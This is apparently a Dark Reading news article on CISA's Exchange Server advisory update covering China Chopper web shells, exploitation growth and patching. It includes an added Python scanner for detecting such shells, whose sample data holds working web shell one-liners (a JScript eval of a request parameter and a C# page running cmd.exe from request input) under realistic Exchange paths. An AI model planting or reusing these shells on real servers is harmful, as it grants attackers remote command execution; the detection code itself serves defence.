Dark Reading is part of the Informa Tech Division of Informa PLC

Threat Intelligence

3/15/2021
04:20 PM

CISA Updates Microsoft Exchange Advisory to Include China Chopper

US officials warn organizations of China Chopper Web shells as new data sheds light on how the Exchange Server exploits have grown.

US government officials have updated their guidance on the Microsoft Exchange Server flaws to include seven China Chopper Web shells linked to successful attacks against vulnerable servers.

The Department of Homeland Security's Cybersecurity & Infrastructure Security Agency (CISA) has been updating its Mitigate Microsoft Exchange Server Vulnerabilities webpage since Microsoft released out-of-band security updates for four Exchange Server flaws on March 2. In the weeks since, attackers have scanned for and exploited the bugs at target organizations around the world.

On March 13, CISA updated its guidance to include seven Malware Analysis Reports (MARs), each identifying a China Chopper Web shell associated with exploitation of the Exchange Server vulnerabilities. In these intrusions, once an attacker has exploited a target server to gain initial access, they typically upload a Web shell to keep remote, command-level access to the host.

Web shells serve several purposes in cyberattacks. Beyond remote administration, attackers use them to exfiltrate sensitive data and credentials, or to upload additional malware and extend their foothold on the network. A Web shell on an Internet-facing host can relay commands to internal hosts that have no direct Internet access, or it can serve as command-and-control infrastructure, for example as a botnet node or as a staging point for compromising other external networks.

China Chopper is a Web shell that Cynet, Palo Alto Networks' Unit 42, Red Canary, and other security companies tracking the threat have widely observed in these ongoing attacks. Its server-side component is a lightweight, one-line script (an ASPX page in the Exchange intrusions) that passes an attacker-supplied request parameter to an eval call; the real functionality sits in the attacker's client, which is why the file on disk is so small and easy to miss. It has been used by several attack groups in recent years.
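As an added example (not code from CISA, Microsoft, or any of the vendors named on this page), the scanner below scores ASPX content on the traits of that one-liner: a server-side page that hands a request parameter straight to eval() with the "unsafe" permission set, plus weaker signals (server-side code that routes request input into a dynamic-execution call, and a page far smaller than any real Exchange view). The sample pages, their paths, the score weights and the thresholds are all constructed for the demonstration; on a real server you would point scan_tree() at the IIS and Exchange web roots where such files are dropped.

```python
"""Triage scanner for China Chopper-style ASPX web shells.

Added example, not CISA's or Microsoft's tooling. Sample pages, paths,
score weights and thresholds below are constructed for the demonstration.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, Iterator, List

# Strong indicator: the China Chopper one-liner, eval(Request[...], "unsafe"),
# in any spacing and with the Item/Form/QueryString collection variants.
EVAL_REQUEST_UNSAFE = re.compile(
    r"""eval\s*\(\s*Request\s*(?:\.(?:Item|Form|QueryString))?\s*\[[^\]]*\]\s*,\s*["']unsafe["']\s*\)""",
    re.IGNORECASE,
)
# Weaker indicators, scored together: a server-side page, request input reaching
# a dynamic-execution call, and a file far smaller than a real Exchange view.
SERVER_SIDE = re.compile(r"""<%@\s*Page\b|runat\s*=\s*["']?server""", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\bRequest\s*(?:\.(?:Item|Form|QueryString))?\s*\[", re.IGNORECASE)
DYNAMIC_EXEC = re.compile(r"\b(?:eval|Execute|ExecuteGlobal|Process\.Start|CreateObject)\s*\(", re.IGNORECASE)
SMALL_FILE_BYTES = 1024  # constructed threshold
FLAG_THRESHOLD = 5       # constructed threshold


@dataclass
class Finding:
    path: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)


def score_content(path: str, data: bytes) -> Finding:
    """Score one file's bytes; higher means more China Chopper-like."""
    text = data.decode("utf-8", errors="replace")
    finding = Finding(path=path)
    if EVAL_REQUEST_UNSAFE.search(text):
        finding.score += 10
        finding.reasons.append('eval(Request[...], "unsafe") one-liner')
    if SERVER_SIDE.search(text) and REQUEST_INPUT.search(text) and DYNAMIC_EXEC.search(text):
        finding.score += 5
        finding.reasons.append("server-side code passes request input to a dynamic-execution call")
    if len(data) < SMALL_FILE_BYTES and SERVER_SIDE.search(text):
        finding.score += 2
        finding.reasons.append(f"server-side page under {SMALL_FILE_BYTES} bytes")
    return finding


def is_suspicious(finding: Finding) -> bool:
    return finding.score >= FLAG_THRESHOLD


def scan_tree(root: str, extensions=(".aspx", ".asp", ".ashx", ".asmx")) -> Iterator[Finding]:
    """Walk a web root (an IIS or Exchange directory) and yield flagged files."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(64 * 1024)  # shells are tiny; cap reads so big assets do not slow the walk
            except OSError:
                continue
            finding = score_content(path, data)
            if is_suspicious(finding):
                yield finding


# Constructed samples (paths and contents are illustrative, not recovered files).
SAMPLES: Dict[str, bytes] = {
    # Classic China Chopper ASPX one-liner.
    "aspnet_client/system_web/lol.aspx":
        b'<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>',
    # Page_Load form of the same shell.
    "owa/auth/helper.aspx":
        b'<script language="JScript" runat="server">function Page_Load(){eval(Request["cmd"],"unsafe");}</script>',
    # C# variant with no eval: only the weaker signals catch it.
    "ecp/run.aspx":
        b'<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["c"]); %>',
    # Benign, small server-side page: stays under the threshold.
    "owa/auth/logon.aspx":
        b'<%@ Page Language="C#" Inherits="Microsoft.Exchange.HttpProxy.LogonPage" %>\r\n'
        b'<html><body><form runat="server"></form></body></html>',
}


def scan_samples() -> Dict[str, int]:
    """Score the constructed samples and return {path: score} for the flagged ones."""
    scored = {path: score_content(path, data) for path, data in SAMPLES.items()}
    return {path: f.score for path, f in scored.items() if is_suspicious(f)}


if __name__ == "__main__":
    for path, data in SAMPLES.items():
        f = score_content(path, data)
        verdict = "FLAG" if is_suspicious(f) else "ok  "
        print(f"{verdict} {f.score:>2} {path}  {'; '.join(f.reasons)}")
```

The weaker signals also catch the C# variant that spawns a shell from a request parameter, which an exact match on the eval(...,"unsafe") string would miss; that generalization is the example's, not something the page describes. Treat a hit as triage input to be paired with the file's creation time and the IIS logs for requests to that path, not as proof on its own, and note that a small legitimate server-side page scores 2 and is not flagged.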

Researchers with SecurityScorecard observed two variants of China Chopper in these attacks, they explain in a blog post. The second, they say, appears to mark an evolution in technique, perhaps to keep the file name from being exposed in the Offline Address Book (OAB) file, to let attackers upload multiple files, or to let them generate file names at random.

"The fact that China Chopper is a tool used by certain [advanced persistent threat] groups and the fact that China Chopper was specifically used to attack the vulnerable Microsoft services leads us to believe that additional APT groups are targeting these vulnerabilities," Cynet researchers report. It has become clear that several groups are exploiting these flaws, some before a patch was released.

CISA and some private firms tracking the attacks note that China Chopper is not the only Web shell in use. SecurityScorecard found other Web shell code designed to check whether security tools from FireEye, CrowdStrike, and Carbon Black were present on a network, a sign that attackers may be gathering intelligence about target environments before attempting to deploy more malware.

In addition to the MARs published over the weekend, CISA has added information on ransomware activity tied to the exploitation of vulnerable Exchange servers. Microsoft said last week that it is tracking a ransomware family called DearCry that targets compromised servers.

Attacks Grow Tenfold, Researchers Report
As analysts continue to track and report on these attacks, a larger picture has emerged of where these flaws are being exploited and how fast the activity is growing. Check Point Research has observed the number of attempted attacks quickly grow from 700 on March 11, 2021, to more than 7,200 on March 15.

The most heavily targeted country is the United States, which accounts for 17% of all exploit attempts, followed by Germany (6%), the United Kingdom (5%), the Netherlands (5%), and Russia (4%). Government and military is the most targeted sector, at 23% of all attempts, followed by manufacturing (15%), banking and financial services (14%), software vendors (7%), and healthcare (6%).

It remains unclear just how many organizations have been targeted with these exploits. ESET researchers have detected Web shells on more than 5,000 email servers as of March 10; so far, high-profile victims include the Norwegian Parliament and the European Banking Authority. Some reports indicate as many as 30,000 organizations in the US could potentially be affected.

Patching is underway, but vulnerable businesses still have work to do. In an update published March 12, Microsoft reported about 82,000 Exchange servers need to be updated. This marks a significant drop from its count of more than 100,000 vulnerable servers on March 9.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ...